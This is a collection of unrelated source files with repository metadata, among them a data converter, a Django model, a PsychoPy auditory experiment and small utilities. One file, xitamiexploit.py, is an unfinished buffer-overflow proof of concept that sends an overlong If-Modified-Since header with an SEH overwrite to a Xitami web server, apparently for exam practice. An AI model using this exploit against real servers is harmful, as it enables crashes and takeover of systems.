# License: GPL-2, see https://hg.rafaelmartins.eng.br/blohg/file/tip/LICENSE for more details.
from docutils import nodes
from docutils.parsers.rst import Directive
match = 'code'
class Code(Directive):
"""reStructuredText directive that creates a pre tag suitable for
decoration with http://alexgorbatchev.com/SyntaxHighlighter/
Usage example::
.. source:: python
print "Hello, World!"
.. raw:: html
<script type="text/javascript" src="http://alexgorbatchev.com/pub/sh/current/scripts/shCore.js"></script>
<script type="text/javascript" src="http://alexgorbatchev.com/pub/sh/current/scripts/shBrushPython.js"></script>
<link type="text/css" rel="stylesheet" href="http://alexgorbatchev.com/pub/sh/current/styles/shCoreDefault.css"/>
<script type="text/javascript">SyntaxHighlighter.defaults.toolbar=false; SyntaxHighlighter.all();</script>
"""
required_arguments = 1
optional_arguments = 0
has_content = True
def run(self):
self.assert_has_content()
self.options['brush'] = self.arguments[0]
html = '''\
<pre class="brush: %s">
%s
</pre>
'''
return [nodes.raw('', html % (self.options['brush'],
"\n".join(self.content).replace('<', '<')),
format='html')]
def makeExtension():
return Code
|
[
"info@posativ.org"
] |
info@posativ.org
|
052e51ffcec636fa0d7bb9772bc936bb1e455464
|
686054d9b42c0c679dbbfb495e3daf7eafa6ca90
|
/import/method_V1/asc_to_csv.py
|
eabed0b9c55e0d0dbe6de3eff11799b157580fee
|
[] |
no_license
|
danielzhou/Rainflux
|
8d66d63d65f0481647383c2c7704aca1b249e3bb
|
d3ceb68ba3967a37fc877bd4acd1ebae6e333076
|
refs/heads/master
| 2020-09-29T15:13:22.744967
| 2020-03-07T08:14:53
| 2020-03-07T08:14:53
| 227,060,838
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,535
|
py
|
# -*- coding:utf-8 -*-
# Tools: PyCharm 2018.2
# Author: DING YI
___date__ = '2018/12/4 2:57'
import numpy as np
import pandas as pd
import time
import os
# 获取文件的创建时间
def get_FileCreateTime(filePath):
t = os.path.getctime(filePath)
return t
# 计时开始
# start = time.clock()
# 获取文件创建时间的时间戳
file_path = r'C:\Users\user\Desktop\ZYJ_InfluxDB\data\origin_data\point_19--22_part.asc'
time_creative = get_FileCreateTime(file_path)
# 导入文件
df = pd.DataFrame(pd.read_csv(file_path, header=None, names = ['Point']))
# 读取END所在行的行数
line_end = df[df['Point'].isin(['END'])].index.values
# print(line_end)
# 删除前面几行
df_data = df.drop(np.arange(line_end+1), inplace=False)
columns_family = ['Point1','Point2','Point3','Point4','Point5','Point6','Point7','Point8','Point9','Point10',
'Point11','Point12','Point13','Point14','Point15','Point16','Point17','Point18','Point19','Point20',
'Point21','Point22','Point23','Point24','Point25','Point26','Point27','Point28','Point29','Point30',
'Point31','Point32','Point33','Point34','Point35','Point36','Point37','Point38','Point39','Point40',
'Point41','Point42','Point43','Point44','Point45','Point46','Point47','Point48','Point49','Point50',
'Point51','Point52','Point53','Point54','Point55','Point56','Point57','Point58','Point59','Point60',
'Point61','Point62','Point63','Point64','Point65','Point66','Point67','Point68','Point69','Point70',
'Point71','Point72','Point73','Point74','Point75','Point76','Point77','Point78','Point79','Point80',
'gps:Latitude','gps:Longitude','gps:Altitude','gps:EastVelocity','gps:NorthVelocity','gps:UpVelocity','gps:NumberOfSatellites','gps:Speed']
# 分列,索引作为时间戳
# df_split = pd.DataFrame((x.split(" ") for x in df_data['Point']), index=((df_data.index-76)/1024+time_creative), columns=['Point1','Point2','Point3','Point4','Point5','Point6','Point7','Point8','Point9','Point10','Point11','Point12','Point13','Point14','Point15','Point16','Point17','Point18','Point19','Point20','Point21','Point22','Point23','Point24','Point25','Point26','Point27','Point28','Point29','Point30','Point31','Point32','Point33','Point34','Point35','Point36','Point37','Point38','Point39','Point40','Point41','Point42','Point43','Point44','Point45','Point46','Point47','Point48','Point49','Point50','Point51','Point52','Point53','Point54','Point55','Point56','Point57','Point58','Point59','Point60','Point61','Point62','Point63','Point64','Point65','Point66','Point67','Point68','Point69','Point70','Point71','Point72','Point73','Point74','Point75','Point76','Point77','Point78','Point79','Point80','gps:Latitude','gps:Longitude','gps:Altitude','gps:EastVelocity','gps:NorthVelocity','gps:UpVelocity','gps:NumberOfSatellites','gps:Speed'])
df_split = pd.DataFrame((x.split(" +") for x in df_data['Point']), index=((df_data.index-int(line_end)+1)/1024+time_creative))
# 结果仍有空格/制表符,使用\\s匹配任意空白。不行,结果后面无法分列,整个为一列了。
# df_split = pd.DataFrame((x.split("\\s+") for x in df_data['Point']), index=((df_data.index-int(line_end)+1)/1024+time_creative))
# 修改列名
df_split.columns = columns_family[:df_split.columns.size]
df_split.index.name = "Time"
# 导出csv
df_split.to_csv("./csv_test.csv", index=True, sep=',')
# 计时
# end = time.clock()
# elapsed = end - start
# print("Time used:", elapsed)
|
[
"1358304569@qq.com"
] |
1358304569@qq.com
|
691b52ef9217d81a10cc5e6df8a8e390660b4769
|
7bd150f13b92010ae3d2b852ed291d8e71f57199
|
/analytics/util.py
|
32a75c382bc4db8e2fefe276509f41aa4a0f17a0
|
[
"MIT"
] |
permissive
|
SidSachdev/CurrentLocationAPI
|
5438374ffc9d555a56294bfec427ea8e95ec9247
|
cc2c8b9e7381c289a29ebd2a59a135847eb9a957
|
refs/heads/master
| 2022-09-06T18:46:31.357310
| 2020-06-02T04:54:44
| 2020-06-02T04:54:44
| 268,671,288
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,608
|
py
|
import logging
from fuzzywuzzy import fuzz
from models.merchant import Merchant
from constants import Threshold
logging.basicConfig(level=logging.DEBUG)
log = logging.getLogger("analytics.util.py")
def get_matching_merchants(sess, request_id, user_id, visits, search_string):
"""
A util function that uses the threshold to return the list of merchants
that match the fuzzy ratio set by the environment or default
:param sess: Session object for the DB
:param request_id: Request ID tracking for debugging
:param user_id: User id to get the User Object
:param visits: list of visits by the user without the matching
:param search_string: given search string to narrow down search
:return: list of objects with narrowed down list based on search string
"""
result = []
log.debug(
"[{}] Fuzzy matching for search string {} user_id: {}".format(
request_id, search_string, user_id
)
)
for visit in visits:
merchant = Merchant.get_by_pk(sess, request_id, visit.merchant_pk)
if (
fuzz.ratio(merchant.merchant_name, search_string) > Threshold.FUZZY_MATCH_THRESHOLD
):
result.append(
{
"visitId": visit.visit_id,
"timestamp": visit.timestamp,
"merchant": {
"merchantId": merchant.merchant_id,
"merchantName": merchant.merchant_name,
},
"user": {"userId": user_id},
}
)
return result
|
[
"noreply@github.com"
] |
SidSachdev.noreply@github.com
|
b590e1016cb64dc5b3b45457027b0c553b39280f
|
55e28e35db5bf6a844df3fb47080500b115a893e
|
/day11/s5.py
|
dc0aa1f8cdc6fd1556254c9900278c56cc2c6fc2
|
[] |
no_license
|
pylarva/Python
|
5743ffa4a69db42b642d51b62f9e9b69ddbc1a72
|
71b484950e6dbdcf708726a68a3386d0d6ddc07f
|
refs/heads/master
| 2020-04-19T09:11:11.195393
| 2017-11-16T07:32:59
| 2017-11-16T07:32:59
| 67,507,687
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 357
|
py
|
# !/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:pylarva
# bolg:www.lichengbing.com
import threading
def func(i, e):
print(i)
e.wait()
print(i + 100)
event = threading.Event()
for i in range(10):
t = threading.Thread(target=func, args=(i, event,))
t.start()
event.clear()
inp = input('>>>')
if inp == '1':
event.set()
|
[
"1326126359@qq.com"
] |
1326126359@qq.com
|
105aa9c86cfe3ecb2b1fe883e6274b5107f93133
|
2ecc0fb80a7ab46612800803db06e3538a50a396
|
/DP/jump-game-ii.py
|
16cc57c67f6a4b925df22d4334adcb0b9dbb49ac
|
[] |
no_license
|
vishaalgc/codes
|
f3da924694120c9da199e4dfdd73481774bb149b
|
4c8a8b6197adfaaafd744ded3a50580d517fc9f1
|
refs/heads/main
| 2023-06-24T20:02:48.843869
| 2021-07-20T14:27:34
| 2021-07-20T14:27:34
| 378,338,753
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 616
|
py
|
class Solution:
def jump(self, nums):
n = len(nums)
dp = [2**31]*n
dp[0] = 0
for i in range(n):
end = nums[i]+i
for j in range(end,i,-1):
if j < n:
if dp[j] > dp[i]+1:
dp[j] = dp[i]+1
else:
break
print(i,j,dp)
# print(dp)
return dp[n-1]
s = Solution()
nums = [2,3,1,1,4]
# nums = [2,3,0,1,4]
# nums = [1]
# nums = [2,1]
nums = [1,2,3]
print(s.jump(nums))
|
[
"vishaalgc@gmail.com"
] |
vishaalgc@gmail.com
|
e5d6607fa91db255527d43aac41b23164fa6348e
|
b3f60d85f75a538282dfabb2b4afa6fe9ecfb19a
|
/Xitami/xitamiexploit.py
|
0069df7a4507cb9c549d70176549935f82aef2be
|
[] |
no_license
|
ironspideytrip/OSCE-Prep-Zero-day-practice
|
34ecf47e22cb1fb92d13cf04444e93c962cfb03f
|
4ff52ede0a74728f34f40950727870ecefb155af
|
refs/heads/master
| 2022-12-04T06:06:36.668936
| 2020-08-30T08:10:13
| 2020-08-30T08:10:13
| 280,714,382
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 754
|
py
|
#Need to update
import socket
import sys
host = "10.0.2.15"
port = 80
#B2 96 45 00(seh)
crash ="A" *72 + "\x7B\x46\x86\x7C"+ "\xcc\xcc\xcc\xcc" +"C" * (188-80) +"\xcc\xcc\xcc\xcc" +"\xB2\x96\x45"
req = "GET / HTTP/1.1\r\n"
req += "Host: 192.168.1.201\r\n"
req += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
req += "Accept-Language: en-US,en;q=0.5\r\n"
req += "Accept-Encoding: gzip, deflate\r\n"
req += "Connection: close\r\n"
req += "Upgrade-Insecure-Requests: 1\r\n"
req += "If-Modified-Since: Wed, " + crash + "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(req)
s.close()
|
[
"noreply@github.com"
] |
ironspideytrip.noreply@github.com
|
d619b9bfa01b6d2f8ba0985ab9d544101708f35d
|
54d508cb6f02bd21190aac5af1899f3f589e961a
|
/experiments/IMRT/aeft.py
|
5b464dc6dcd981d9023d6027cd553410657a171e
|
[] |
no_license
|
tqbwqing/DrThesis
|
27bef38853a089aab2712512cde26ea3d8edb05e
|
233b727d4332301b29d7cbd7012e2bdbc7a15fdd
|
refs/heads/master
| 2020-09-15T02:47:34.741544
| 2019-05-28T08:23:22
| 2019-05-28T08:23:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,303
|
py
|
# Neue AEFT-Version (26.05.17)
# Letztes Update 31.05.2017
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division
from psychopy import locale_setup, gui, visual, core, data, event, logging, sound
import numpy as np
import os
import threading
import sys
# declaration of global variables (used by response pad)
global green, left, right
right = False
left = False
green = False
def StartResponsePad():
import pyxid
global right, left, green
dev = pyxid.get_xid_devices()[0]
dev.reset_base_timer()
while True:
dev.poll_for_response()
if dev.response_queue_size() > 0:
response = dev.get_next_response()
if response['pressed'] == True:
if response['key'] == 3:
right = True
if response['key'] == 7:
green = True
if response['key'] == 2:
left = True
def StartRPThread():
rp = threading.Thread(target=StartResponsePad)
rp.daemon = True
rp.start()
class Trial:
def __init__(self, condition, minID, maxID):
trial_handler = data.TrialHandler(nReps=1, method='sequential',
trialList=data.importConditions(condition, selection='0:145'),
seed=None, name='Block_1')
self.TrialData = trial_handler.trialList
self.LastTrial = 0
self.ActiveTrial = 0
self.minID = minID
self.maxID = maxID
self.correct = 0
self.meanTime = 0
def NextTrial(self):
self.LastTrial = self.ActiveTrial
try:
ID = np.random.randint(self.minID, self.maxID)
# print("ID: " + str(ID)) (only for debugging purposes)
except:
print("ERROR: Trial List empty.")
raise
self.ActiveTrial = self.TrialData[ID]
try:
self.TrialData.pop(ID)
except:
print("ERROR: Trial List empty.")
raise
self.maxID += -1
def TrialBlock(self, number):
global left, right
self.Clock = core.Clock()
Achtung = visual.TextStim(win=myWin, name='Achtung',
text='Achtung!',
font='Arial',
pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=0.0);
continueRoutine = True
continueTrial = True
self.N = 0
self.N2 = self.maxID - self.minID
while continueTrial:
if self.N + 1 >= self.N2:
continueTrial = False
self.NextTrial()
target = sound.Sound(self.ActiveTrial['file_target'], secs=-1)
interleaved = sound.Sound(self.ActiveTrial['file_interleaved'], secs=-1)
targetStatus = 0
interleavedStatus = 0
continueRoutine_Buffer = False
continueRoutine = True
firstPress = True
self.Clock.reset()
while continueRoutine:
t = self.Clock.getTime()
if t <= 5.4:
right = False
left = False
if t >= 1 and targetStatus == 0:
Achtung.draw()
myWin.flip()
if t >= 2 and targetStatus == 0:
myWin.flip()
target.play()
targetStatus = 1
if t >= 5.4 and interleavedStatus == 0:
interleaved.play()
interleavedStatus = 1
if right and firstPress and interleavedStatus == 1:
continueRoutine_Buffer = True
right = False
firstPress = False
answer = "n"
tKey = t - 5.4
if left and firstPress and interleavedStatus == 1:
continueRoutine_Buffer = True
left = False
firstPress = False
answer = "c"
tKey = t - 5.4
if continueRoutine_Buffer and interleavedStatus == 1 and t >= 7.4:
continueRoutine = False
if interleavedStatus == 1 and t >= 9:
answer = "none"
tKey = -1
continueRoutine = False
if event.getKeys(keyList=["escape"]):
core.quit()
thisExp.addData('file_target',self.ActiveTrial['file_target'])
thisExp.addData('file_interleaved',self.ActiveTrial['file_interleaved'])
thisExp.addData('cond',self.ActiveTrial['cond'])
thisExp.addData('target',self.ActiveTrial['target'])
thisExp.addData('Ans_corr',self.ActiveTrial['Ans_corr'])
thisExp.addData('cond_inside',self.ActiveTrial['cond_inside'])
thisExp.addData('block_number', number)
thisExp.addData('trial_number', self.N)
thisExp.addData('time', tKey)
thisExp.addData('answer', answer)
if answer == str(self.ActiveTrial['Ans_corr']):
thisExp.addData('correct answer?', 1)
self.correct += 1
else:
thisExp.addData('correct answer?', 0)
thisExp.nextEntry()
self.meanTime += tKey / 16
self.N += 1
if __name__ == "__main__":
### Init of Psychopy stuff
expName = 'AEFT' #
expInfo = {u'session': u'001', u'participant': u'' , u'condition type': ['A', 'B']}
dlg = gui.DlgFromDict(dictionary=expInfo, title=expName)
if dlg.OK == False:
core.quit() # user pressed cancel
expInfo['date'] = data.getDateStr() # add a simple timestamp
expInfo['expName'] = expName
if expInfo['condition type'] == "A":
conditions = "conditions_FormA.csv"
if expInfo['condition type'] == "B":
conditions = "conditions_FormB.csv"
filename = u'data/%s_%s_%s' % (expInfo['participant'], expName, expInfo['date'])
thisExp = data.ExperimentHandler(name=expName, version='',
extraInfo=expInfo, runtimeInfo=None,
originPath=None,
savePickle=True, saveWideText=True,
dataFileName=filename)
global myWin
myWin = visual.Window(size=(1920, 1200), fullscr=True, allowGUI=False,winType='pyglet',
monitor='testMonitor', screen=0, color=[-1.000,-1.000,-1.000], colorSpace='rgb',
blendMode='avg')
# Init of response pad
StartRPThread()
# Instructions
continueInstruction = True
while continueInstruction:
head_geninstr = visual.TextStim(win=myWin, name='head_geninstr',
text='Welcome!',
font='Comic Sans',
pos=(0, 0.7), height=0.1, wrapWidth=1.5, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=0.0);
main_geninstr = visual.TextStim(win=myWin, name='main_geninstr',
text=u'In this task you will hear a melody, consisting 6 tones, played on an electronic piano. After that, you will hear a sequence of two mixed melodies. Sometimes the melody which you heard first will be included but entangled with another melody. In the other cases the melody will not be inlcuded in the mixed sequence. \n\n\n\n',
font='Arial',
pos=(0, 0), height=0.065, wrapWidth=1.5, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-1.0);
foot_geninstr = visual.TextStim(win=myWin, name='foot_geninstr',
text=u'Continue with the green button!',
font='Arial',
pos=(0, -0.9), height=0.04, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-2.0);
head_geninstr.draw()
main_geninstr.draw()
foot_geninstr.draw()
myWin.flip()
if event.getKeys(keyList=["escape"]):
core.quit()
if green:
continueInstruction = False
green = False
continueInstruction = True
while continueInstruction:
main_geninstr_2 = visual.TextStim(win=myWin, name='main_geninstr_2',
text=u'After you have heard the melody and the mixed sequence, you should decide if the melody was included in the mixed sequence. Press the button on the right-hand side if the melody was included, on the left-hand side if not. Please try to be as fast as possible. Press the green button to continue with a short trial.',
font='Arial',
pos=(0, 0), height=0.075, wrapWidth=1.5, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=0.0);
foot_geninstr_2 = visual.TextStim(win=myWin, name='foot_geninstr_2',
text=u'Continue with the green button!',
font='Arial',
pos=(0, -0.9), height=0.04, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-1.0);
main_geninstr_2.draw()
foot_geninstr_2.draw()
myWin.flip()
if event.getKeys(keyList=["escape"]):
core.quit()
if green:
continueInstruction = False
green = False
# Practice Block
trial = Trial(conditions, 0, 16)
trial.TrialBlock("practice")
msg = "You have answered %i stimuli correctly. \n (reaction time=%.2f s)" %(trial.correct , trial.meanTime)
continueInstruction = True
while continueInstruction:
head_feedback = visual.TextStim(win=myWin, name='head_feedback',
text=u'Trial finished!',
font='Arial',
pos=(0, 0.85), height=0.1, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-1.0);
main_feedback = visual.TextStim(win=myWin, name='main_feedback',
text=msg,
font='Arial',
pos=(0, 0), height=0.075, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-2.0);
foot_feedback = visual.TextStim(win=myWin, name='foot_feedback',
text=u'Continue with the green button!',
font='Arial',
pos=(0, -0.9), height=0.04, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-3.0);
head_feedback.draw()
main_feedback.draw()
foot_feedback.draw()
myWin.flip()
if event.getKeys(keyList=["escape"]):
core.quit()
if green:
continueInstruction = False
green = False
continueInstruction = True
while continueInstruction:
head_begin = visual.TextStim(win=myWin, name='head_begin',
text='Start of the experiment',
font='Arial',
pos=(0, 0.75), height=0.1, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=0.0);
main_begin = visual.TextStim(win=myWin, name='main_begin',
text='First part. You are now well prepared for the experiment. If you have any questions, please ask the supervisor.',
font='Arial',
pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-1.0);
foot_begin = visual.TextStim(win=myWin, name='foot_begin',
text=u'Continue with the green button!',
font='Arial',
pos=(0, -0.9), height=0.04, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-3.0);
head_begin.draw()
main_begin.draw()
foot_begin.draw()
myWin.flip()
if event.getKeys(keyList=["escape"]):
core.quit()
if green:
continueInstruction = False
green = False
# First 8 trials
trial = Trial(conditions, 16, 80)
trial.TrialBlock(1)
continueInstruction = True
while continueInstruction:
main_begin_2 = visual.TextStim(win=myWin, name='main_begin_2',
text='Break!',
font='Arial',
pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=0.0);
foot_begin_2 = visual.TextStim(win=myWin, name='foot_begin_2',
text=u'Continue with the green button!',
font='Arial',
pos=(0, -0.9), height=0.04, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=-2.0);
main_begin_2.draw()
foot_begin_2.draw()
myWin.flip()
if event.getKeys(keyList=["escape"]):
core.quit()
if green:
continueInstruction = False
green = False
# Second 8 trials
trial = Trial(conditions, 80, 144)
trial.TrialBlock(2)
continueInstruction = True
while continueInstruction:
main_thanks = visual.TextStim(win=myWin, name='main_thanks',
text=u'Thank you for your participation. The supervisor will now continue to guide you through the session.',
font='Arial',
pos=(0, 0), height=0.1, wrapWidth=None, ori=0,
color='white', colorSpace='rgb', opacity=1,
depth=0.0);
main_thanks.draw()
myWin.flip()
if event.getKeys(keyList=["escape"]):
core.quit()
if green:
continueInstruction = False
green = False
|
[
"teresa.wenhart@gmx.de"
] |
teresa.wenhart@gmx.de
|
d528cdacfede880f9f14ff74d6e95b3e9fe79d18
|
074f3ae0feba35fdf7e5e1b671780c4bb5d39d90
|
/students/models.py
|
85b8f6959f016110dae948326bfd703fef9840d7
|
[] |
no_license
|
aakhvostov/django_hw_8_testing
|
4a41589687db8ab64ffafe74085d72cdcd32722c
|
a8dec38a5f50b597943aed73c48c34df324b8b59
|
refs/heads/master
| 2023-04-03T02:21:47.539951
| 2021-03-23T09:27:15
| 2021-03-23T09:27:15
| 350,651,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 326
|
py
|
from django.db import models
class Student(models.Model):
name = models.TextField()
birth_date = models.DateField(
null=True,
)
class Course(models.Model):
name = models.TextField()
students = models.ManyToManyField(
Student,
blank=True,
related_name="course"
)
|
[
"skitol@yandex.ru"
] |
skitol@yandex.ru
|
6a4c42fa1139ad611c0cb192a9f35f255cbaeada
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/response/AlipayMarketingToolFengdieEditorGetResponse.py
|
400d69ff0b9e34578ec8dd0953f905e881f4d2fb
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 936
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.FengdieEditorGetRespModel import FengdieEditorGetRespModel
class AlipayMarketingToolFengdieEditorGetResponse(AlipayResponse):
def __init__(self):
super(AlipayMarketingToolFengdieEditorGetResponse, self).__init__()
self._data = None
@property
def data(self):
return self._data
@data.setter
def data(self, value):
if isinstance(value, FengdieEditorGetRespModel):
self._data = value
else:
self._data = FengdieEditorGetRespModel.from_alipay_dict(value)
def parse_response_content(self, response_content):
response = super(AlipayMarketingToolFengdieEditorGetResponse, self).parse_response_content(response_content)
if 'data' in response:
self.data = response['data']
|
[
"liuqun.lq@alibaba-inc.com"
] |
liuqun.lq@alibaba-inc.com
|
d393d84a2956744022939b557c3179418b5c3398
|
e02180b0000c9c0ed14e950c30429f405965371f
|
/NewAgeLiberty/wsgi.py
|
2a1b115e515e93c38d41bba2edbbef7443f24d46
|
[
"MIT"
] |
permissive
|
NAL0/Dja
|
cecb164fbf06babcde4bbe1ede11a89c760ad260
|
ed763d787a751fc6e63df6c6fd35f6ad28de0e08
|
refs/heads/master
| 2020-03-29T01:33:12.598304
| 2019-01-28T21:42:01
| 2019-01-28T21:42:01
| 149,394,476
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 403
|
py
|
"""
WSGI config for NewAgeLiberty project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "NewAgeLiberty.settings")
application = get_wsgi_application()
|
[
"nosocks94@gmail.com"
] |
nosocks94@gmail.com
|
c86e0865e0c26603c4194fb711017a9166f58fe9
|
cf5ceed90310006a4543d976882c85bc701efab3
|
/crawley/http/request.py
|
2ee8051481215e854868f1e700e2e775c4a43f2f
|
[] |
no_license
|
hammadk373/crawley
|
698b1aff51267a78f5e9f18d78f43e1dd69d75bd
|
f7522cfa0446b523b93e8056991f9d10e9754ff0
|
refs/heads/master
| 2021-01-18T06:52:07.753729
| 2011-10-28T02:37:00
| 2011-10-28T02:37:00
| 2,663,083
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,077
|
py
|
import time
import random
from eventlet.green import urllib2
from cookies import CookieHandler
from crawley.config import REQUEST_TIMEOUT, MOZILLA_USER_AGENT
class Request(object):
"""
Custom request object
"""
def __init__(self, url, cookie_handler=None):
if cookie_handler is None:
cookie_handler = CookieHandler()
self.url = url
self.headers = {}
self.headers["User-Agent"] = MOZILLA_USER_AGENT
self.headers["Accept-Charset"] = "ISO-8859-1,utf-8;q=0.7,*;q=0.3"
self.headers["Accept-Language"] = "es-419,es;q=0.8"
self.cookie_handler = cookie_handler
def get_response(self, data=None):
"""
Returns the response object from a request.
Cookies are supported via a CookieHandler object
"""
self._normalize_url()
request = urllib2.Request(self.url, data, self.headers)
opener = urllib2.build_opener(self.cookie_handler)
if REQUEST_TIMEOUT is not None:
response = opener.open(request, timeout=REQUEST_TIMEOUT)
else:
response = opener.open(request)
self.cookie_handler.save_cookies()
return response
def _normalize_url(self):
"""
Normalize the request url
"""
self.url = urllib2.quote(self.url.encode('utf-8'), safe="%/:=&?~#+!$,;'@()*[]")
class DelayedRequest(Request):
"""
A delayed custom Request
"""
def __init__(self, url, cookie_handler=None, delay=0, deviation=0):
self.delay = delay + random.randint(-deviation, deviation)
Request.__init__(self, url, cookie_handler)
def get_response(self, data=None):
"""
Waits [delay] miliseconds and then make the request
"""
mili_seconds = self.delay / 1000
time.sleep(mili_seconds)
return Request.get_response(self, data)
|
[
"jmg.utn@gmail.com"
] |
jmg.utn@gmail.com
|
ca4ff9f942bf417f6de624872efe568d0c0f4458
|
f469071d593df865e3c3b676655250d48b9b6b9e
|
/Search_engine/urls.py
|
03c696a505a37d0da73482b3af55e4a17f9c11bd
|
[] |
no_license
|
jayednahain/eComarce_django
|
af1ba704458a07290bbe4c291d71ce7c8c84edcf
|
8941349a5bdd9fdc55e3787b6adbdc31a4c57aab
|
refs/heads/main
| 2023-08-19T02:47:09.578771
| 2021-09-26T12:37:39
| 2021-09-26T12:37:39
| 391,820,014
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 182
|
py
|
from django.urls import path
from Search_engine import views
urlpatterns = [
#class based veiw
path('',views.CB_Search_ProductListview.as_view(),name='search_link'),
]
|
[
"jayednahian@yahoo.com"
] |
jayednahian@yahoo.com
|
769b940e5bcb345108cf45b4661ec78f939a45e2
|
467fdc6993ba8b1393faac58a804367465c016c9
|
/tests/common/test_model_utils.py
|
674fd32975dcb541ef7d60dbaed32b8050962619
|
[
"Apache-2.0"
] |
permissive
|
codeaudit/DeCLUTR
|
b8d8043a49cfecd20da93f66c07ff26652ff61f8
|
94d63e1b1978896c3446a7a4f85f6adfc454a088
|
refs/heads/master
| 2023-03-25T06:04:20.269495
| 2021-03-26T16:48:57
| 2021-03-26T16:48:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,583
|
py
|
from copy import deepcopy
import torch
from allennlp.data import TextFieldTensors
from hypothesis import given, settings
from hypothesis.strategies import integers
from declutr.common.model_utils import unpack_batch
class TestModelUtils:
@settings(deadline=None)
@given(
batch_size=integers(min_value=1, max_value=4),
num_anchors=integers(min_value=1, max_value=4),
max_length=integers(min_value=1, max_value=16),
)
def test_unpack_batch(self, batch_size: int, num_anchors: int, max_length: int) -> None:
# Create some dummy data.
two_dim_tensor = torch.randn(batch_size, max_length)
two_dim_input: TextFieldTensors = {
"tokens": {
"token_ids": two_dim_tensor,
"mask": torch.ones_like(two_dim_tensor),
"type_ids": torch.ones_like(two_dim_tensor),
}
}
three_dim_tensor = torch.randn(batch_size, num_anchors, max_length)
three_dim_input: TextFieldTensors = {
"tokens": {
"token_ids": three_dim_tensor,
"mask": torch.ones_like(three_dim_tensor),
"type_ids": torch.ones_like(three_dim_tensor),
}
}
four_dim_tensor = torch.randn(batch_size, num_anchors, num_anchors, max_length)
four_dim_input: TextFieldTensors = {
"tokens": {
"token_ids": four_dim_tensor,
"mask": torch.ones_like(four_dim_tensor),
"type_ids": torch.ones_like(four_dim_tensor),
}
}
# Only TextFieldTensors with tensors of three dimensions should be reshaped...
# Tensors are updated in-place, so deepcopy before passing to unpack_batch
actual_three_input_dim = unpack_batch(deepcopy(three_dim_input))
for name, tensor in actual_three_input_dim["tokens"].items():
assert torch.equal(
tensor,
three_dim_input["tokens"][name].reshape(batch_size * num_anchors, max_length),
)
# ...unpack_batch is a no-op for TextFieldTensors with tensors less than or greater than 3D.
actual_two_dim_input = unpack_batch(deepcopy(two_dim_input))
for name, tensor in actual_two_dim_input["tokens"].items():
assert torch.equal(tensor, two_dim_input["tokens"][name])
actual_four_dim_input = unpack_batch(deepcopy(four_dim_input))
for name, tensor in actual_four_dim_input["tokens"].items():
assert torch.equal(tensor, four_dim_input["tokens"][name])
|
[
"johnmgiorgi@gmail.com"
] |
johnmgiorgi@gmail.com
|
e957298594705e73339598471ace2f9e583a6de7
|
703deed0b0076c405e9f71dd6a9e8d38748d5233
|
/ex28format.py
|
0ae6b0b3c89ba352af0a00b11063987472f849fc
|
[] |
no_license
|
GuilhermeBeco/Python1
|
043d2075a6e3d76ae8e8215ce99ab79d8ce41a61
|
1a30bb75f4d8e4cbd22137b77296065cd4ea2f1d
|
refs/heads/master
| 2020-04-08T19:11:35.714415
| 2019-04-11T09:50:16
| 2019-04-11T09:50:16
| 159,644,312
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 207
|
py
|
def main():
vezes=int(input("Qual o numero que pretende fazer a tabuada: "))
for counter in range(1,10):
res=counter*vezes
print("{0:^4} * {0^:2} = {1:^4}".format(vezes,counter,res))
|
[
"guilhermebeco1999@gmail.com"
] |
guilhermebeco1999@gmail.com
|
